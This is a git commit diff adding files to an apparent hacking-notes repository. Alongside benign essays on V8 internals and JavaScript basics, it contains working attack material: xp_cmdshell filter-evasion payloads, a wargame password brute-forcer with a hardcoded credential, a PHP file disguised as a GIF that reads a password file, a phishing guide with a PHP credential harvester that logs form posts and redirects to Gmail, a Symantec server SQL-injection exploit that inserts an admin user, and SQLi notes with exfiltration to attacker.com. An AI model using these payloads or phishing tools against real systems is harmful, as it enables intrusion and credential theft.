add the stuff floating from other machines

writer 2024-10-15 10:13:30 +09:00
parent 30e65244e2
commit 35788d79e2
252 changed files with 12374 additions and 603 deletions


@ -0,0 +1,191 @@
# A Closer Look at Chrome's Security: Understanding V8
[In 2008, Google released a sandbox-oriented browser](http://blogoscoped.com/google-chrome/) that was assembled from several different code libraries from Google and third parties (for instance, it borrowed its rendering machinery from the open-source [Webkit layout engine](https://www.webkit.org/), later changing it to a forked version, [Blink](http://en.wikipedia.org/wiki/Blink_(layout_engine))). Six years later, Chrome has become the preferred browser for [half of the users on the Internet](http://en.wikipedia.org/wiki/File:Usage_share_of_web_browsers_(Source_StatCounter).svg). In this post I investigate how security is dealt with in this browser, summarize the main features of Chrome and its [Chromium Project](http://www.chromium.org/Home), and describe how JavaScript is processed with the **V8 JavaScript virtual machine**.
## The way computers talk...
In mainstream computer languages, [source code in a **high-level language** is transformed into a **low-level language**](http://www.openbookproject.net/thinkcs/python/english2e/ch01.html) (a machine or assembly language) by either being **compiled** or **interpreted**. It is [a very simple concept](https://www.youtube.com/watch?v=_C5AHaS1mOA), but it is a fundamental one!
### Compilers and Interpreters
**Compilers** produce an intermediate form called **object code**, which is like machine code but augmented with symbol tables so it can be packaged into executable blocks (library files, object files). A linker is then used to combine these pieces into the final executable.
**Interpreters** execute instructions without compiling them into machine language first. The instructions are first translated into a lower-level intermediate representation, such as **byte code** or an **abstract syntax tree** (AST), which is then interpreted by a **virtual machine**.
The truth is that things are generally mixed. For example, when you type some instruction in Python's REPL, [the language executes four steps](http://akaptur.com/blog/2013/11/17/introduction-to-the-python-interpreter-3/): *lexing* (breaks the code into pieces), *parsing* (generates an AST with those pieces - it is the syntax analysis), *compiling* (converts the AST into code objects - which are attributes of the function objects), and *interpreting* (executes the code objects).
In Python, byte-compiled code, in the form of **.pyc** files, is used by the compiler to speed up the start-up time (load time) for short programs that use a lot of standard modules. And, by the way, byte codes are attributes of the code object, so to see them you need to call ```func_code``` (the code object) and ```co_code``` (the bytecode)[1]:
```py
>>> def some_function():
... return
...
>>> some_function.func_code.co_code
'd\x00\x00S'
```
On the other hand, traditional JavaScript code is represented as bytecode or an AST, and then executed in a *virtual machine* or further compiled into machine code. When a JavaScript engine interprets code, it executes roughly the following steps: *parsing* and *preprocessing*, *scope analysis*, and *bytecode generation or translation to native code*. Just a note: Mozilla's [SpiderMonkey](https://developer.mozilla.org/en-US/docs/Mozilla/Projects/SpiderMonkey/Internals/Bytecode) engine, for instance, represents JavaScript as bytecode.
So we see that when modern languages choose the way they compile or interpret code, they are trading off startup cost against the speed at which they want things to run. Since browsers care about delivering content as fast as they can, this is a fundamental concern.
### Method JITs and Tracing JITs
To speed things up, instead of parsing and compiling all of the code before executing it ([ahead-of-time compilation](http://en.wikipedia.org/wiki/Ahead-of-time_compilation)), **dynamic translators** (*just-in-time* translators, or JITs) can be used. JITs *translate an intermediate representation into machine language at runtime*. They have the efficiency of running native code, at the cost of startup time plus increased memory (when the bytecode or AST is first compiled).
Engines have different policies on code generation, which can roughly be grouped into two types: **tracing** and **method**.
**Method JITs** emit native code for every block (method) of code and update references dynamically. Method JITs can implement an *inline cache* for rewriting type lookups at runtime.
In **tracing JITs**, native code is only emitted when a certain block (method) is considered *important*. An example is given by traditional JavaScript: if you load a script with functions that are never used, they are never compiled. Additionally, in JavaScript a *cache* is usually implemented due to the nature of its *dynamic typing system*.
As we will see below, V8 performs direct JIT compilation from (JavaScript) source code to native machine code (IA-32, x86-64, ARM, or MIPS ISAs), **without transforming it to bytecode first**. In addition, V8 performs several dynamic optimizations at runtime (including **inline caching**). But let's not get ahead of ourselves! Also, as a note, Google has implemented a technology called [**Native Client**](http://code.google.com/p/nativeclient/) (NaCl), which allows one to provide compiled code to the Chrome browser.
----
## The way JavaScript rolls...
JavaScript's integration with [Netscape Navigator](http://en.wikipedia.org/wiki/Netscape_Navigator) in the mid-90s made it easier for developers to access HTML page elements such as *forms*, *frames*, and *images*. This was essential for JavaScript's ascent to becoming the most popular scripting language for the web.
However, the language's highly dynamic behavior (which I briefly discuss here) came with a price: in the mid-2000s browsers had very slow implementations that did not scale with code size or *object allocation*. Issues such as *memory leaks* when running web apps were becoming mainstream. It was clear that things would only get worse and that a new JavaScript engine was needed.
### JavaScript's Structure
In JavaScript, every object has a *prototype*, and a prototype is also an object. All JavaScript objects inherit their properties and methods from their prototype.
So, for example, suppose an application has an object *Point* (borrowed from the [official documentation](https://developers.google.com/v8/design)):
```JavaScript
function Point(x,y){
this.x = x;
this.y = y;
}
```
We can create several objects:
```JavaScript
var a = new Point(0,1);
var b = new Point(2,3);
```
And we can access the property ```x``` in these objects by:
```
a.x;
b.x;
```
In the above implementation, we would have two different Point objects that do not share any structure. This is because JavaScript is **classless**: you create new objects on the fly and dynamically add or remove properties. Functions can move from one object to another. Objects of the same type can appear at the same sites in the program with no constraints.
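For instance (a small sketch of this flexibility):
```JavaScript
var obj = { x: 1 };          // created on the fly
obj.greet = function() {     // a property (here, a function) added dynamically
  return "hi";
};
delete obj.x;                // and removed dynamically

var other = {};
other.greet = obj.greet;     // the function moves to another object
other.greet();               // "hi"
```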
Furthermore, to store object properties, most JavaScript engines use a *dictionary-like data structure*. Each property access requires a dynamic lookup to resolve the property's location in memory. This contrasts with *static* languages such as Java, where instance variables are located at fixed offsets determined by the compiler (thanks to the *fixed* object layout defined by the *object's class*). In that case, access is a simple memory load or store (a single instruction).
### JavaScript's Garbage Collection
Garbage collection is a form of *automatic memory management*: an attempt to reclaim the memory occupied by objects that are not being used any longer (*i.e.*, if an object loses its reference, the object's memory has to be reclaimed).
The other possibility is *manual memory management*, which requires the developer to specify which objects need to be deallocated. However, manual garbage collection can result in bugs such as:
1. **Dangling pointers**: when a piece of memory is freed while there are still pointers to it.
2. **Double free bugs**: when the program tries to free a region of memory that it had already freed.
3. **Memory leaks**: when the program fails to free memory occupied by an object that had become unreachable, leading to memory exhaustion.
As one could guess, JavaScript has automatic memory management. In fact, a core design flaw of traditional JavaScript engines is **bad garbage collection behavior**. The problem is that these engines do not know exactly where all the pointers are, so they have to search through the entire execution stack to figure out which data look like pointers (for instance, an integer can look like a pointer to an address in the heap).
------------
## Introducing V8
A solution for the issues presented above came from Google, with the **V8 Engine**. V8 is an [open source JavaScript engine](https://code.google.com/p/v8/) written in C++ and built for Chrome. V8 has a way to categorize highly dynamic JavaScript objects into classes, bringing techniques from static class-based languages. In addition, as I mentioned in the beginning, V8 compiles JavaScript to native machine code before executing it.
In terms of performance, besides direct compilation to native code, three main features in V8 are fundamental:
1. Hidden classes.
2. In-line caching as an optimization technique.
3. Efficient memory management system (garbage collection).
Let's take a look at each of them.
### V8's Hidden Class
In V8, as execution goes on, objects that end up with the same properties will share the same **hidden class**. This way, the engine applies dynamic optimizations.
Consider the Point example from before: we have two different objects, ```a``` and ```b```. Instead of keeping them completely independent, V8 makes them share a hidden class. So instead of creating two objects, we have *three*. The hidden class records that both objects have the same properties, and an object changes its hidden class when a new property is added.
So, for our example, if another Point object is created (a code sketch of these transitions follows the list):
1. Initially, the Point object has no properties, so the newly created object refers to the initial (empty) hidden class **C0**.
2. When property ```x``` is added, V8 follows the hidden class transition from **C0** to **C1** and writes the value of ```x``` at the offset specified by **C1**.
3. When property ```y``` is added, V8 follows the hidden class transition from **C1** to **C2** and writes the value of ```y``` at the offset specified by **C2**.
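In code, the transitions for a new Point look roughly like this (a sketch; **C0**, **C1**, and **C2** are just labels for the hidden classes described above):
```JavaScript
var p = new Point(5, 6);  // the empty object starts with hidden class C0
// this.x = x;  -> transition C0 -> C1, x written at the offset recorded in C1
// this.y = y;  -> transition C1 -> C2, y written at the offset recorded in C2

var q = new Point(7, 8);  // follows the same transitions and ends up sharing C2 with p
```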
Instead of performing a generic dictionary lookup for the property, V8 generates efficient machine code to access it. The machine code generated for accessing ```x``` is something like this:
```
# ebx = the point object
cmp [ebx, <class offset>], <cached class>
jne <inline cache miss>
mov eax, [ebx, <cached x offset>]
```
Instead of a complicated property lookup, reading the property translates into three machine instructions!
It might seem inefficient to create a new hidden class whenever a property is added. However, because of the class transitions, the hidden classes can be reused many times. It turns out that most accesses are to objects with the same hidden class.
### V8's Inline caching
The first time the code runs, the engine does not yet know the hidden class at a given access site. V8 optimizes property access by predicting that the same class will also be used for all future objects accessed in the same section of code, and adds that information to the **inline cache code**.
Inline caching is a class-based object-oriented optimization technique employed by some language runtimes. The concept of inline caching is based on the observation that the objects that occur at a particular call site are often of the same type. Therefore, performance can be increased by storing the result of a method lookup *inline* (at the call site).
If V8 has predicted the object's hidden class correctly, the property is accessed in a single operation. If the prediction is incorrect, V8 patches the code to remove the optimization. To support this process, call sites are assigned one of four states (a small JavaScript sketch follows the list):
1. **Uninitialized**: The initial state, for any object that was never seen before.
2. **Pre-monomorphic**: Behaves like uninitialized, but does a one-time lookup and rewrites itself to the monomorphic state. It's good for code executed only once (such as initialization and setup).
3. **Monomorphic**: Very fast. Records the hidden class of the objects already seen.
4. **Megamorphic**: Like the uninitialized state (since it always does a runtime lookup), except that it never replaces itself.
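For instance, a rough JavaScript sketch of why the states matter (the property access below stays monomorphic while it only ever sees objects with the same hidden class, and degrades towards megamorphic once many different shapes flow through it):
```JavaScript
function getX(point) {
  return point.x;  // this property access is an inline-cache site
}

// Monomorphic: every object seen here has the same hidden class.
getX(new Point(1, 2));
getX(new Point(3, 4));

// Objects with different shapes push the cache towards megamorphic.
getX({ x: 1, y: 2, z: 3 });
getX({ x: 1, label: "another shape" });
```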
In conclusion, the combination of using hidden classes to access properties with inline caching (plus machine code generation) optimizes cases where objects of the same type are frequently created and accessed in a similar way. This dramatically improves the speed at which most JavaScript code can be executed.
### V8's Efficient Garbage Collecting
V8 uses **precise garbage collection**: *every pointer's location on the execution stack is known*, so V8 is able to implement incremental garbage collection. V8 can migrate an object to another place and rewire the pointers to it.
In summary, [V8's garbage collection](https://developers.google.com/v8/design#garb_coll):
1. stops program execution when performing a garbage collection cycle,
2. processes only part of the object heap in most collection cycles (minimizing the impact of stopping the application),
3. always knows exactly where all objects and pointers are in memory (avoiding falsely identifying objects as pointers).
-------------
## Further Readings:
* [Privacy And Security Settings in Chrome](https://noncombatant.org/2014/03/11/privacy-and-security-settings-in-chrome/)
[1] When the Python interpreter is invoked with the ```-O``` flag, optimized code is generated and stored in ***.pyo*** files. The optimizer removes assert statements.


@ -0,0 +1,423 @@
# JavaScript: Crash Course
# Installing & Setting up
JavaScript (JS) is a dynamic computer programming language. Install the [Chrome Developer Tools](https://developer.chrome.com/devtools/index) to proceed.
# JavaScript 101
To include your example.js in an HTML page (placing it right before ```</body>``` usually guarantees that page elements are defined when the script is executed):
```
<script src="/path/to/example.js"></script>
```
Variables can be defined using multiple var statements or in a single combined var statement. The value of a variable declared without a value is undefined.
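For example (a minimal sketch):
```
// Multiple var statements or a single combined statement:
var a = 1;
var b = 2,
    c;
console.log( c ); // undefined
```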
## Types in JavaScript
### Primitive:
- String
- Number
- Boolean
- null (represents the absence of a value, similar to many other programming languages)
- undefined (represents a state in which no value has been assigned at all)
### Objects:
```
// Creating an object with the constructor:
var person1 = new Object;
person1.firstName = "John";
person1.lastName = "Doe";
alert( person1.firstName + " " + person1.lastName );
// Creating an object with the object literal syntax:
var person2 = {
firstName: "Jane",
lastName: "Doe"
};
alert( person2.firstName + " " + person2.lastName );
// Array
// Creating an array with the constructor:
var foo = new Array;
// Creating an array with the array literal syntax:
var bar = [];
// If/Else
var foo = true;
var bar = false;
if ( bar ) {
// This code will never run.
console.log( "hello!" );
}
if ( bar ) {
// This code won't run.
} else {
if ( foo ) {
// This code will run.
} else {
// This code would run if foo and bar were both false.
}
}
```
### Flow Control
#### switch
```
switch ( foo ) {
case "bar":
alert( "the value was bar -- yay!" );
break;
case "baz":
alert( "boo baz :(" );
break;
default:
alert( "everything else is just ok" );
}
```
#### for
```
for ( var i = 0; i < 5; i++ ) {
// Logs "try 0", "try 1", ..., "try 4".
console.log( "try " + i );
}
```
#### while
```
var i = 0;
while ( i < 100 ) {
// This block will be executed 100 times.
console.log( "Currently at " + i );
i++; // Increment i
}
or
var i = -1;
while ( ++i < 100 ) {
// This block will be executed 100 times.
console.log( "Currently at " + i );
}
```
#### do-while
```
do {
// Even though the condition evaluates to false
// this loop's body will still execute once.
alert( "Hi there!" );
} while ( false );
```
### Ternary Operator
```
// Set foo to 1 if bar is true; otherwise, set foo to 0:
var foo = bar ? 1 : 0;
```
### Arrays
```
// .length
var myArray = [ "hello", "world", "!" ];
for ( var i = 0; i < myArray.length; i = i + 1 ) {
console.log( myArray[ i ] );
}
// .concat()
var myArray = [ 2, 3, 4 ];
var myOtherArray = [ 5, 6, 7 ];
var wholeArray = myArray.concat( myOtherArray );
// .join()
// Joining elements
var myArray = [ "hello", "world", "!" ];
// The default separator is a comma.
console.log( myArray.join() ); // "hello,world,!"
// Any string can be used as separator...
console.log( myArray.join( " " ) ); // "hello world !";
console.log( myArray.join( "!!" ) ); // "hello!!world!!!";
// ...including an empty one.
console.log( myArray.join( "" ) );
// .pop() and .push()
```
#### Remove or add the last element
```.pop()``` removes the last element of the array and ```.push()``` adds one at the end. ```.slice()``` extracts a part of the array and returns that part in a new array; it takes one parameter, which is the starting index:
```
// .reverse()
var myArray = [ "world" , "hello" ];
myArray.reverse(); // [ "hello", "world" ]
// .shift()
var myArray = [];
myArray.push( 0 ); // [ 0 ]
myArray.push( 2 ); // [ 0 , 2 ]
myArray.push( 7 ); // [ 0 , 2 , 7 ]
myArray.shift(); // [ 2 , 7 ]
// .slice()
```
#### Remove a certain number of elements
```.splice()``` removes elements and adds new ones at the given index. It takes at least three parameters:
* Index The starting index.
* Length The number of elements to remove.
* Values The values to be inserted at the index position.
```
var myArray = [ 0, 7, 8, 5 ];
myArray.splice( 1, 2, 1, 2, 3, 4 );
console.log( myArray ); // [ 0, 1, 2, 3, 4, 5 ]
// .sort()
```
#### Sorts an array
It takes one parameter, which is a comparing function. If this function is not given, the array is sorted ascending:
```
// Sorting with comparing function.
function descending( a, b ) {
return b - a;
}
var myArray = [ 3, 4, 6, 1 ];
myArray.sort( descending ); // [ 6, 4, 3, 1 ]
```
#### Inserts an element at the first position of the array
This is done with ```.unshift()```. Finally, ```.forEach()``` calls a given function once for each element of the array:
```
// .forEach()
function printElement( elem ) {
console.log( elem );
}
function printElementAndIndex( elem, index ) {
console.log( "Index " + index + ": " + elem );
}
function negateElement( elem, index, array ) {
array[ index ] = -elem;
}
myArray = [ 1, 2, 3, 4, 5 ];
// Prints all elements to the console
myArray.forEach( printElement );
// Prints "Index 0: 1", "Index 1: 2", "Index 2: 3", ...
myArray.forEach( printElementAndIndex );
// myArray is now [ -1, -2, -3, -4, -5 ]
myArray.forEach( negateElement );
```
### Strings
Strings are both a primitive and an object in JavaScript.
Some properties and methods:
* length
* charAt()
* indexOf()
* substring()
* split()
* toLowerCase()
* replace()
* slice()
* lastIndexOf()
* concat()
* trim()
* toUpperCase()
### Objects
Nearly everything in JavaScript is an object - arrays, functions, numbers, even strings - and they all have properties and methods.
```
var myObject = {
sayHello: function() {
console.log( "hello" );
},
myName: "Rebecca"
};
myObject.sayHello(); // "hello"
console.log( myObject.myName ); // "Rebecca"
// The key can be any valid identifier:
var myObject = {
validIdentifier: 123,
"some string": 456,
99999: 789
};
```
### Functions
Can be created in many ways:
```
// Function expression (loaded when execution reaches it):
var foo = function() {
// Do something.
};
// Function declaration (hoisted, loaded first):
function foo() {
// Do something.
}
// If you declare a local variable and forget to use the var keyword,
// that variable is automatically made global.
// Immediately-Invoked Function Expression (IIFE):
(function() {
var foo = "Hello world";
})();
console.log( foo ); // undefined!
```
### Events
JavaScript lets you execute code when events are detected.
Example of code that changes an image's source:
```
window.onload = init;
function init() {
var img = document.getElementById("example");
img.src = "example.jpg";
}
```
Some common events:
* click
* resize
* play
* pause
* load
* unload
* dragstart
* drop
* mousemove
* mousedown
* keypress
* mouseout
* touchstart
* touchend
### Closure
Closures are one of the key features of JavaScript.
Example of a closure for a counter. Without a closure, we would normally write:
```
var count = 0;
function counter(){
count += 1;
return count;
}
console.log(counter()); // prints 1
console.log(counter()); // prints 2
```
However, in JS we can enclose our counter inside its own environment. This is useful for large codebases with multiple collaborators, for example, where we might need counter-like variables more than once:
```
function makeCounter(){
var count = 0;
function counter(){
count += 1;
return count;
}
return counter; // the closure holds count!
}
```
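A quick usage sketch of the closure above:
```
var counterA = makeCounter();
var counterB = makeCounter();
console.log( counterA() ); // 1
console.log( counterA() ); // 2
console.log( counterB() ); // 1 -- each closure holds its own count
```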
### Prototypes
```
function dog(name, color){
this.name = name;
this.color = color;
}
dog.prototype.species = "canine";
dog.prototype.bark = function() {
// bark behavior goes here
};
```
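For instance (a small sketch using the constructor above), instances created with ```new``` share the members defined on the prototype:
```
var rex = new dog( "Rex", "brown" );
console.log( rex.name );    // "Rex"
console.log( rex.species ); // "canine" -- looked up on the prototype
rex.bark();
```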
### jQuery
Type Checking with jQuery:
```
// Checking the type of an arbitrary value.
var myValue = [ 1, 2, 3 ];
// Using JavaScript's typeof operator to test for primitive types:
typeof myValue === "string"; // false
typeof myValue === "number"; // false
typeof myValue === "undefined"; // false
typeof myValue === "boolean"; // false
// Using strict equality operator to check for null:
myValue === null; // false
// Using jQuery's methods to check for non-primitive types:
jQuery.isFunction( myValue ); // false
jQuery.isPlainObject( myValue ); // false
jQuery.isArray( myValue ); // true
```
---
Enjoy! This article was originally posted [here](https://coderwall.com/p/skucrq/javascript-crash-course).


@ -0,0 +1,108 @@
# OS Command Injection
* Methodology:
- Identify data entry points
- Inject data (payloads)
- Detect anomalies from the response.
- Automate
* For example, for the snippet:
```
String cmd = new String("cmd.exe /K processReports.bat clientId=" + input.getValue("ClientId"));
Process proc = Runtime.getRuntime().exec(cmd);
```
For a client id of **444**, we would have the following string:
```
cmd.exe /K processReports.bat clientId=444
```
However, an attacker could instead use a client id of **444 && net user hacked hacked /add**. In this case, we have the following string:
```
cmd.exe /K processReports.bat clientId=444 && net user hacked hacked /add
```
## Examples of Injection Payloads:
* Control characters and common attack strings:
- ```'--``` (SQL injection)
- ```&&```, ```|``` (OS command injection)
- ```<>``` (XSS)
* Long strings (AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)
* Binary or Null data
## Fuzz Testing Web Applications
* Focus on the relevant attack surface of the web application.
* Typically HTTP request parameters:
- QueryString
- POST data
- Cookies
- Other HTTP headers (User-Agent, Referer)
* Other entry points with request structures:
- XML web services
- WCF, GWT, AMF
- Remote Method Invocation (RMI)
* Fixing injection flaws:
- Comprehensive, consistent server-side input validation
- Use safe command APIs
- Avoid concatenating strings passed to an interpreter (see the sketch after this list)
- Use strong data types in favor of strings
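A sketch of the safer pattern in Node.js (hypothetical names; it assumes the report generator can be invoked directly as an executable rather than through a shell). The untrusted value is passed as a separate argument, so it is never parsed by a shell:
```
// Node.js sketch: pass untrusted input as a separate argument, not inside a shell string.
const { execFile } = require("child_process");

const clientId = String(request.query.clientId); // hypothetical untrusted input

execFile("/opt/reports/processReports", ["clientId=" + clientId], (err, stdout) => {
  if (err) { return console.error(err); }
  console.log(stdout);
});
```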
### Whitelist input validation
- Input validated against known GOOD values.
- Exact match:
* A specific list of exact values is defined
* Difficult when large set of values is expected
- Pattern matching:
* Values are matched against known good input patterns.
* Data type, regular expressions, etc. (a sketch follows this list)
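For instance, a small sketch of pattern-matching validation (JavaScript; reusing the client id example from above):
```
// Whitelist validation sketch: accept only values matching a known-good pattern.
function isValidClientId(value) {
  return /^[0-9]{1,10}$/.test(value); // digits only, bounded length
}

isValidClientId("444");                       // true
isValidClientId("444 && net user hacked x");  // false -> reject the request
```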
### Blacklist input validation
- Input validated against known BAD values.
- Not as effective as whitelist validation.
* Susceptible to bypass via encoding
* Global protection and therefore often not aware of context.
- Must constantly change, given the dynamic nature of application attacks.
#### Evading Blacklist filters
Exploit payloads:
```
';exec xp_cmdshell 'dir';--
```
```
;Declare @cmd as varchar(3000);Set @cmd =
x+'p+'_+'c+'m+'d+s+'h+'e+'l+'l+'/**/+””+d+i'+r+””;exec(@cmd);--
```
```
;ex/**/ec xp_cmds/**/hell dir;--
```
```
Declare @cmd as varchar(3000);Set @cmd
=(CHAR(101)+CHAR(120)+CHAR(101)+CHAR(99)+CHAR(32)+CHAR(109)+CHAR(97)+CHAR(115)+CHA
R(116)+CHAR(101)+CHAR(114)+CHAR(46)+CHAR(46)+CHAR(120)+CHAR(112)+CHAR(95)+CHAR(99)+
CHAR(109)+CHAR(100)+CHAR(115)+CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(32)+CH
AR(39)+CHAR(100)+CHAR(105)+CHAR(114)+CHAR(39)+CHAR(59));EXEC(@cmd);--
```
```
;Declare @cmd as varchar(3000);Set @cmd =
convert(varchar(0),0x78705F636D647368656C6C202764697227);exec(@cmd);--
```


@ -0,0 +1,44 @@
#!/usr/bin/python
__author__ = "bt3"
import requests
import string
def brute_force_password(LENGTH, AUTH, CHARS, URL1, URL2):
password = ''
for i in range(1, LENGTH+1):
for j in range (len(CHARS)):
print("Position %d: Trying %s ..." %(i, CHARS[j]))
r = requests.get( ( URL1 + password + CHARS[j] + URL2 ), auth=AUTH)
if 'bananas' not in r.text:
password += CHARS[j]
print("Password so far: " + password)
break
return password
if __name__ == '__main__':
# authorization: login and password
AUTH = ('natas16', 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh')
# BASE64 password and 32 bytes
CHARS = string.ascii_letters + string.digits
LENGTH = 32
# crafted url
URL1 = 'http://natas16.natas.labs.overthewire.org?needle=$(grep -E ^'
URL2 = '.* /etc/natas_webpass/natas17)banana&submit=Search'
print(brute_force_password(LENGTH, AUTH, CHARS, URL1, URL2))


@ -0,0 +1,5 @@
GIF89a
<?php
readfile('/etc/natas_webpass/natas14
');
?>


@ -0,0 +1,31 @@
<?php
$cookie = base64_decode('ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw');
function xor_encrypt($in){
$text = $in;
$key = json_encode(array( "showpassword"=>"no", "bgcolor"=>"#ffffff"));
$outText = '';
for($i=0;$i<strlen($text);$i++) {
$outText .= $text[$i] ^ $key[$i % strlen($key)];
}
return $outText;
}
print xor_encrypt($cookie);
function xor_encrypt_mod(){
$text = json_encode(array( "showpassword"=>"yes", "bgcolor"=>"#ffffff"));
$key = 'qw8J';
$outText = '';
for($i=0;$i<strlen($text);$i++) {
$outText .= $text[$i] ^ $key[$i % strlen($key)];
}
return $outText;
}
print base64_encode(xor_encrypt_mod());
?>


@ -0,0 +1,26 @@
# Phishing
* A way of deceiving your victim by making him/her log in through one of your web pages, which is a clone of the original.
* Fake login/scam pages are often used to steal identification information.
## Tools
### Cloning a Login Page
```
$ wget -U "Mozilla/5.0" -mkL http://facebook.com
```
### Free Hostings:
- http://www.my3gb.com/
- http://110mb.com/
- http://www.freehostia.com/
- http://www.awardspace.com/
- http://prohosts.org/
- http://www.000webhost.com/
- http://www.atspace.com/
- http://zymic.com/


@ -0,0 +1,13 @@
<?php
header ('Location:http://www.gmail.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n"); }
fwrite($handle,"\r\n");
fclose($handle);
exit;
?>


@ -0,0 +1,43 @@
#!/usr/bin/env python
# Reference: http://seclists.org/fulldisclosure/2015/Jan/91
import httplib
def send_request(host,data):
params = data
headers = {"AppFire-Format-Version": "1.0",
"AppFire-Charset": "UTF-16LE",
"Content-Type":"application/x-appfire",
"User-Agent":"Java/1.7.0_45",
}
conn = httplib.HTTPSConnection(host)
conn.request("POST", "/sis-ui/authenticate", params, headers)
response = conn.getresponse()
data=response.read()
conn.close()
return response,data
if __name__ == '__main__':
header ="Data-Format=text/plain\nData-Type=properties\nData-Length=%i\n\n"
data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO USR (RID, USERNAME,
PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO,
PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT)
VALUES (1504, 'secconsult', 'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=', '', '',
'', '', '', '', '', '', NULL, 'SV DESCRIPTION', '2014-09-12 07:13:09', '2014-09-12
07:13:23', '1', '0', '0',
'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto=');
-- '' " # add user to USR table
#data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO ROLEMAP (USERRID,
ROLERID) VALUES (1504, 1); -- " # add user to admin group
data+="\r\nan=Symantec Data Center Security Server
6.0\r\npwd=GBgYGBgYGBgYGBgYGBgYGBg=\r\nav=6.0.0.380\r\nhn=WIN-3EJQK7U0S3R\r\nsso=\r\n"
data = data.encode('utf-16le')
eof_flag="\nEOF_FLAG\n"
header = header %(len(data))
payload=header+data+eof_flag
response,data = send_request("<host>:4443",payload)
print data.decode('utf-16le')
print response.status

Web_Hacking/SQLi/README.md

@ -0,0 +1,212 @@
# SQL Injections (SQLi)
![](http://i.imgur.com/AcVJKT2.png)
* SQL works by building query statements, and these statements are intended to be readable and intuitive.
* A SQL query can be easily manipulated, since the application assumes a query is a reliable command. This means that crafted SQL queries can pass unnoticed by access control mechanisms.
* By diverting standard authentication and authorization checks, an attacker can gain access to important information stored in a database.
* Exploitation:
- Dumping contents from the database.
- Inserting new data.
- Modifying existing data.
- Writing to disk.
## The Simplest Example
A parameter passed for a name of a user:
```
SELECT * FROM users WHERE
name="$name";
```
In this case, the attacker just needs to inject a logical expression that is always true, like ```1=1```:
```
SELECT * FROM users WHERE 1=1;
```
This makes the **WHERE** clause always true, which means the query will return the values matching all users.
Nowadays it is estimated that less than 5% of the websites have this vulnerability.
These types of flaws facilitate the occurrence of other attacks, such as XSS or buffer overflows.
## Blind SQL Injection
* INFERENCE: useful technique when data not returned and/or detailed error messages disabled. We can differentiate between two states based on some attribute of the page response.
* It's estimated that over 20% of websites have this flaw.
* In traditional SQLi it is possible to reveal the information directly through the attacker's payload. In blind SQLi, the attacker needs to ask the server whether something is TRUE or FALSE. For example, you can ask for a user: if the user exists, the page loads normally, so the answer is true.
* Timing-based techniques: infer based on delaying database queries (sleep(), waitfor delay, etc).
```
IF SYSTEM_USER="john" WAIFOR DELAY '0:0:15'
```
* Response-based techniques (True or False): infer based on text in response. Examples:
```
SELECT count (*) FROM reviews WHERE author='bob' (true)
SELECT count (*) FROM reviews WHERE author='bob' and '1'='1' (true)
SELECT count (*) FROM reviews WHERE author='bob' and '1'='2' (false)
SELECT count (*) FROM reviews WHERE author='bob' and SYSTEM_USER='john' (false)
SELECT count (*) FROM reviews WHERE author='bob' and SUBSTRING(SYSTEM_USER,1,1)='a' (false)
SELECT count (*) FROM reviews WHERE author='bob' and SUBSTRING(SYSTEM_USER,1,1)='c' (true)
```
(and continue to iterate until finding the value of SYSTEM_USER; a sketch of automating this loop follows).
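A rough sketch of automating that character-by-character inference (JavaScript; ```askServer()``` is a hypothetical helper that submits the injected condition and reports whether the page response looked "true"):
```
// Blind SQLi inference sketch: recover SYSTEM_USER one character at a time.
const CHARS = "abcdefghijklmnopqrstuvwxyz0123456789";

async function recoverSystemUser(maxLength) {
  let known = "";
  for (let pos = 1; pos <= maxLength; pos++) {
    for (const c of CHARS) {
      const condition = "SUBSTRING(SYSTEM_USER," + pos + ",1)='" + c + "'";
      if (await askServer(condition)) { // hypothetical: true/false based on the page response
        known += c;
        break;
      }
    }
  }
  return known;
}
```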
* Utilize transport outside of HTTP response.
```
SELECT * FROM reviews WHERE review_author=UTL_INADDR.GET_HOST_ADDRESS((select user from dual ||'.attacker.com'));
INSERT into openrowset('sqloledb','Network=DBMSSOCN; Address=10.0.0.2,1088;uid=gds574;pwd=XXX','SELECT * from tableresults') Select name,uid,isntuser from master.dbo.sysusers--
```
### Common ways of Exploitation
* Whenever you see a URL where a **question mark** is followed by a parameter name and value, a value is being sent from one page to another.
* In the example
```
http://www.website.com/info.php?id=10
```
the page *info.php* is receiving the data and will have some code like:
```
$id=$_POST['id'];
```
and an associated SQL query:
```
QueryHere = "select * from information where code='$id'"
```
#### Checking for vulnerability
We can start by verifying whether the target is vulnerable by appending a simple quote symbol ```'``` at the end of the URL:
```
http://www.website.com/info.php?id=10'
```
If the website returns the following error:
You have an error in your SQL syntax...
It means that this website is vulnerable to SQL injection.
#### Find the structure of the database
To find the number of columns and tables in a database we can use [Python's SQLmap](http://sqlmap.org/).
This application streamlines the SQL injection process by automating the detection and exploitation of SQL injection flaws of a database. There are several automated mechanisms to find the database name, table names, and number of columns.
* ORDER BY: it tries to order by column x, from x up to infinity. The iteration stops when the response shows that the input column x does not exist, revealing the value of x (the number of columns).
* UNION: it gathers data located in different table columns. The automated process tries to gather all information contained in the columns/tables x, y, z obtained by ORDER BY. The payload is similar to:
```
?id=5'%22union%22all%22select%221,2,3
```
* Normally the tables and columns are given names such as: user, admin, member, password, passwd, pwd, user_name. The injector uses trial and error to try to identify these names:
```
?id=5'%22union%22all%22select%221,2,3%22from%22admin
```
So, for example, to find the database name, we run the *sqlmap* script with target *-u* and enumeration options *--dbs* (enumerate DBMS databases):
```
$ ./sqlmap.py -u <WEBSITE> --dbs
(...)
